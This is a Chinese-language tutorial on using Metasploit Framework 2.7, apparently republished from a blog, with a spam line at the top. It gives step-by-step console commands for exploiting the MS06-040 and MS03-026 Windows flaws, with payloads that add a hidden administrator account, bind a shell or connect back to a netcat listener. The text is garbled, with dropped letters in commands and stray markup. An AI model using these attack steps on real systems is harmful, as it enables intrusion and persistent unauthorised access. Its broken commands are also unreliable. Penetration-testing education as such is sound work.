自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Metasploit Framework:黑掉整個(gè)星球

安全
Metasploit Framework是一個(gè)編寫,測試和使用exploit代碼的完善環(huán)境。這個(gè)環(huán)境為滲透測試,shellcode編寫和漏洞研究提供了一個(gè)可靠的平臺(tái),這個(gè)框架主要是由面向?qū)ο蟮腜erl編程語言編寫的,并帶有由C語言,匯編程序和Python編寫的可選組件。

Metasploit Framework是一個(gè)編寫,測試和使用exploit代碼的完善環(huán)境。這個(gè)環(huán)境為滲透測試,shellcode編寫和漏洞研究提供了一個(gè)可靠的平臺(tái),這個(gè)框架主要是由面向?qū)ο蟮腜erl編程語言編寫的,并帶有由C語言,匯編程序和Python編寫的可選組件。

Metasploit Framework 作為一個(gè)緩沖區(qū)溢出測試使用的輔助工具,也可以說是一個(gè)漏洞利用和測試平臺(tái)。它集成了各平臺(tái)上常見的溢出漏洞和流行的shellcode,并且不斷更新,使得緩沖區(qū)溢出測試變得方便和簡單。

使用Metasploit安全測試工具在滲透測試中可以做很多事情,你可以保存你的日志、甚至定義每個(gè)有效負(fù)載在運(yùn)行完成之后是如何將其自身清除的。值得一提的是這個(gè)強(qiáng)大的工具是免費(fèi)的,它的開發(fā)團(tuán)隊(duì)由兩個(gè)全職成員和少數(shù)兼職的投稿者組成,Metasploit Framework由最初的1.0版發(fā)展到現(xiàn)在的3.0版的漏洞自動(dòng)化探測,成績驕人,精神可嘉!

下載鏈接:http://down.51cto.com/data/146158

>>去網(wǎng)絡(luò)安全工具百寶箱看看其它安全工具

使用方法

本文以Metasploit Framework 2.7為例,簡述它在命令模式下的使用方法。

1).安裝完成后運(yùn)行MSFUpdate進(jìn)行自動(dòng)更新,如無更新將提示退出程序。如有更新,當(dāng)出現(xiàn)Preserve modifications(yes or no)?時(shí)輸入"es"?行更新.

2).可以通過MSFConsole直接進(jìn)入,也可以在Cygshell下輸入msfconsole進(jìn)入框架命令模式下.

3).使用命令"elp"

可以看到里面有如下的命令:

"?"nbsp;      :獲取幫助。

"d"nbsp;      :更換當(dāng)前的工作目錄。

"xit"nbsp;    :退出。

"elp"nbsp;    :獲取幫助。

"nfo"nbsp;    :顯示當(dāng)前程序的相關(guān)信息。

"uit"nbsp;    :退出程序。

"eload"nbsp; :再載入Exploit和payloads。

"ave"nbsp;    :保存當(dāng)前設(shè)置

"etg"nbsp;    :設(shè)置一個(gè)全局環(huán)境變量。

"nsetg"nbsp; :移除全局環(huán)境變量。

"how"nbsp;    :顯示可用的Exploit和payloads。

"se"nbsp;     :使用一個(gè)Exploit。

"ersion"nbsp;:顯示程序的版本。

例如使用ms06040這個(gè)漏洞,步驟如下(不唯一):

↓   show exploits //顯示可用的exploit,以BSD開頭的是針對BSD系統(tǒng)的ShellCode,以Linx開頭的是針對Linux系統(tǒng)的ShellCode,以CMD和WIN開頭的是針對Windows系統(tǒng)。

‖   info netapi_ms06_040   //查看這個(gè)exploit的相關(guān)信息

↓   use netapi_ms06_040    //使用這個(gè)exploit

‖   show options           //顯示這個(gè)漏洞利用的參數(shù)

↓   set RHOST 192.168.1.11 //設(shè)置遠(yuǎn)程主機(jī)地址這個(gè)參數(shù)

show targets   //顯示exploit支持的操作系統(tǒng)類型

set TARGET 0    //設(shè)置目標(biāo)為0所代表的那個(gè)操作系統(tǒng)類型

show payloads //顯示與正在使用的漏洞利用兼容的有效負(fù)載,說白了Payload就是我們平時(shí)說的ShellCode,不同的系統(tǒng)對不同的ShellCode要求是不一樣。

set PAYLOAD win32_exec //設(shè)置有效載荷為執(zhí)行特定命令

show options      //顯示相關(guān)參數(shù)

set CMD "et user hello world /add"nbsp;   //設(shè)置要執(zhí)行的命令為添加一個(gè)帳號(hào)

set   //檢查環(huán)境設(shè)置

check //檢查目標(biāo)是否存在相關(guān)漏洞

exploit   //檢查無誤后即可進(jìn)行溢出了

4).web模式下使用方法

運(yùn)行Msfweb.bat,在IE地址欄中輸入http://127.0.0.1:55555即可看到操作界面。

單擊“select payload”選項(xiàng)進(jìn)入Payload選擇界面, 選擇需要的Payload后就進(jìn)入基本信息的設(shè)定界面,這里的設(shè)置和前面介紹的基本一致,等都設(shè)定好后,點(diǎn)

Vulnerability Check檢查目標(biāo)系統(tǒng)是否存在相應(yīng)的漏洞,點(diǎn)Launch Exploit進(jìn)行溢出。

展望

最新的Metasploit 3.0版本使用的是Ruby編程語言(RUBY以很少的代碼實(shí)現(xiàn)很多功能而著稱),這說明RUBY已經(jīng)逐漸被黑客社區(qū)所認(rèn)可,是一個(gè)值得注意的新動(dòng)向,雖然它和

NESSUS比起來可能是小巫見大巫,但也有自己獨(dú)到的地方,它的功能強(qiáng)大并且容易使用,對于我們?nèi)粘5臐B透來說是一款非常實(shí)用的工具。當(dāng)然,你完全可以自己向這個(gè)工具中添加任何你認(rèn)為對你有用的溢出工具包。

Metasploit 3.0主要的目標(biāo)如下:

Improve automation of exploitation through scripting

Simplify the process of writing an exploit

Increase code re-use between exploits

Improve and generically integrate evasion techniques

Support automated network discovery and event correlation through recon modules

Continue to provide a friendly outlet for cutting edge exploitation technology

Metasploit的適應(yīng)性和平臺(tái)多功能性都十分強(qiáng)大,加之功能強(qiáng)大,使用簡單等特性將使Metasploit成為業(yè)界流行的經(jīng)典工具。

|=--------------------------=[ Metasploit 2.7的模擬攻擊 ]=--------------------------=|

本地主機(jī):192.168.1.10

目標(biāo)主機(jī):192.168.1.11

1.開虛擬機(jī),用nmap收集目標(biāo)主機(jī)相關(guān)信息

要裝Winpcap后才能使用nmap

winpcap(windows packet capture)是windows平臺(tái)下一個(gè)免費(fèi),公共的網(wǎng)絡(luò)訪問系統(tǒng)。Winpcap可以為為win32應(yīng)用程序提供訪問網(wǎng)絡(luò)底層的能力。

nmap -A 192.168.1.11 -oN C:\1.txt

2.目標(biāo)主機(jī)開啟了msrpc服務(wù)

對應(yīng)的exploit: msrpc_dcom_ms03_026

1).payload設(shè)置為win32_reverse時(shí),為逆向連接。

set LHOST 192.168.1.10

思路:假如不是在一網(wǎng)段,可設(shè)置LHOST為一公網(wǎng)IP,然后在那臺(tái)主機(jī)上用nc監(jiān)聽特定的端口。

3.端口139,445開放,可利用ms06_040這個(gè)漏洞

不清楚目標(biāo)操作系統(tǒng)時(shí)選擇自動(dòng)

1).payload設(shè)置為win32_adduser

  1. set USER blueagle  
  2. set PASS blueagle 

2).payload設(shè)置為win32_bind

Windows Bind shell ,對windows shell的綁定

3).payload設(shè)置為win32_exec

  1. set CMD "et user blueagle blueagle /add"  
  2. set CMD "et localgroup administrators blueagle /add" 

 

責(zé)任編輯:佟健 來源: 百度空間
相關(guān)推薦

2015-05-11 10:16:20

2011-06-13 14:15:02

2011-06-13 14:56:10

2020-10-06 13:58:25

漏洞

2023-06-15 11:59:05

2017-02-16 13:33:54

2015-04-27 13:54:10

2015-06-11 10:03:05

2015-08-11 14:10:25

2016-11-16 15:44:01

2010-01-18 10:01:56

2015-08-17 15:17:09

2012-08-15 10:23:32

2014-02-21 13:02:44

2014-02-11 13:49:00

2018-05-23 12:24:03

2023-05-25 20:16:06

2016-03-31 14:58:18

2023-11-30 14:36:25

2014-09-28 09:34:17

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)